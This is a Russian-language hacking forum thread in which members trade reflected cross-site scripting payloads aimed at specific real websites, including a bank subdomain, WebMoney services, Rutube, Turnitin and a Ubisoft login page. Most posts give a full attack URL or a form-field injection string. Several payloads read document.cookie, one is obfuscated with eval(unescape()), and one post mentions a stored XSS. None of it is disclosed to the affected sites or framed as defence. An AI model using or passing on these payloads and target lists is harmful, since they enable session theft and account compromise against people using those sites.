Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor


XSS


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 48

#1
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
Выкладываем XSS

http://diary.ru/list/?sort=&ord=&show=&fgroup_id=&username=&comm"><script>alert("XSS")</script>

http://www.slate.com/id/2174677/?GT1="><script>alert()</script>

http://knigi.iskal.ru/istorija/scarlet.html?p=24"><script>alert()</script>


#2
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
Поддомен спорт экспресс, жаль что ничего сделать нельзя
http://extreme.sport-express.ru/search?text=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=9&y=">
<script>alert()</script>


#3
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
XSS WM-аукциона ;)
Скрытый текст
http://wmauction.org.ru/shop.php?go=wins&v=WMZ<script>alert(document.cookie)</script>


#4
Root-access

Root-access

    Бит

  • Members
  • 23 сообщений
Скрытый текст

Скрытый текст

Скрытый текст

Скрытый текст

Скрытый текст

Скрытый текст


А приватные сюда стоит скидывать, как думаете?)

#5
Root-access

Root-access

    Бит

  • Members
  • 23 сообщений
Энфикс, с чего же это пассивные?!)))

Просмотр сообщенияENFIX (14.11.2007, 15:10) писал:

>http://webscript.ru/...><script>alert()%3C/script%3E
Чет не пашет..
>А приватные сюда стоит скидывать, как думаете?)
Приватные пассивные XSS? O_o

Вебскрипт:

]]>http://webscript.ru/...e="...</script>]]>

#6
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
http://www.bluesky.ru/index.php?act=country&country_id=%22%3E%3Cscript%3Ealert
('XSS%20by%20MoLoToK')%3C/script%3E


#7
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
http://sobaka.sobaka.ru/index.php?path=%22%3E%3Cscript%3Ealert('by%20MoLoToK')%3C/script%3E


#8
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
megashara
http://megashara.com/search.php?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&x
=21&y=8
очень странно ещё недели 2 назад не было
---

Bubblesnaps.com

В правом верзнем углу в формах e-mail и password вводим код
"><script>alert('XSS')</script>

---
http://www.writers.net/resources.php
в search for books вводим "><script>alert('XSS')</script>

---
turnitin.com

http://www.turnitin.com/quote_request.asp?account_type=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E


#9
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
Detstvo.ru
http://forum.detstvo.ru/showflat.php?Number=128342%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

http://detstvo.ru/auth/login.php?redirect=http%3A%2F%2Frecipe.detstvo.ru%2Fsearch%2F%3Fpath%3D%252
Findex.html%26txt%3D%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252Fscript%253E%
26cooking_time_cat%3D0%26cooking_time%3D%26calorie_cat%3D0%26calorie%3D%26food_type%3D0%26x%3D0%26y
%3D0%26cooking_way%3D0%26diet%3D0%26cur_section%3D1%26sorttype%3D1


#10
Jinn

Jinn

    Байт

  • Members
  • Pip
  • 77 сообщений
http://www.kimep.kz/search/?text=%3Cscript%3Ealert('xss');%3C/script%3E&x=0&y=0


--[ ZaeB.uS, ]]>http://zaeb.us]]> ]---
ICQ: 304227033
Jabber: jinn@jabber.prologic.ws
OCC: 82623

#11
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
http://www.getjar.com/products/11966/EQO
жмём на [write a review], вылезает окно, в поле operator
"><script>alert('XSS')</script>
жмём enter и видем alert

#12
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
http://urb.sbrf.ru/index/ru?act=search&qs=666%22%3E%3Ch1%3EFind%20by%20Defc0n%3C/h1%3E%3C
script%3Ealert('}{SS%20by%20Defc0n')%3C/script%3E%3C!--


#13
rand.0m

rand.0m

    Бит

  • Members
  • 3 сообщений
http://www.securitylab.ru/news/0/?"><script>eval(unescape("alert(document%25%32%65cookie)"));
</script><

https://newsblog.wmtransfer.com/asp/search.asp?keyword=" onfocus="js:alert(document.cookie)"
кликаем по полю поиска..

#14
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
Heroes of Might and Magic
]]>https://secure.ubi.c...ogin/Login.aspx]]>
"><script>alert('XSS')</script>
в username и password

#15
Root-access

Root-access

    Бит

  • Members
  • 23 сообщений
Скрытый текст

tfile.ru

Заходими в поиск:

]]>http://tfile.ru/forum/asearch.php]]>

Набираем:

"><script>alert();</script>"



#16
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
http://www.plast.org.ua/pages/news_add.php
в поле ваш особистий код пишем "><script>alert('XSS')</script>
и жмём отримати код
емейл пишем любой

#17
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
Kulichki.com
Очень долго искал хоть какие-то уязвимости на этом сайте
http://phonecards.kulichki.com/reg/forgot-password.php?login=%22%3E%3Cscript%3Ealert%28
%27XSS%27%29%3C%2Fscript%3E


#18
AFoST

AFoST

    тапочег с вишней

  • Moderator
  • PipPip
  • 256 сообщений
Сайт НЛПерцев.
]]>http://www.nlpcafe.r...%.../)</script>]]>

#19
Jinn

Jinn

    Байт

  • Members
  • Pip
  • 77 сообщений
список проксей :-)
http://nntime.com/index.php?start=1%3Cscript%3Ealert(%27Error%20:-)%27);%3C/script%3E
Может еще можно чего там найти,хз не копал.
P.S. Может стоит "поднять" тему?

--[ ZaeB.uS, ]]>http://zaeb.us]]> ]---
ICQ: 304227033
Jabber: jinn@jabber.prologic.ws
OCC: 82623

#20
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
http://www.gyre.org/subscribe/index.php
"><script>alert('XSS')</script>

#21
Pogant

Pogant

    ASP_noob

  • Members
  • 2 сообщений
 http://www.rss.zelenkov.net/rss_view_channel.php?rss_url=%3Cscript%3Ealert(%22found%20by%20
Pogant%22);%3C/script%3E


#22
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
XSS на Rutube.ru
http://rutube.ru/login.html
"><script>alert('XSS')</script>

#23
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
XSS на Инетболе
Как обычно, месяц на сайте тусю и только щас XSS нашёл
http://inetball.ru/tt_placeCountries.asp?trID=8511&trName="><script>alert('XSS by MoLoToK')</script>
думаю пора темку прикрепить

#24
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
в поле входа, е-мейл и пароль вместе
http://www.drtuning.ru/account/
"><script>alert('XSS')</script>

#25
MoLoToK

MoLoToK

    Кувалда

  • Honourаble
  • PipPipPip
  • 371 сообщений
Активная XSS, админ жжот, банит по ИПу
]]>http://www.sporu.net/new/]]>


Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 анонимных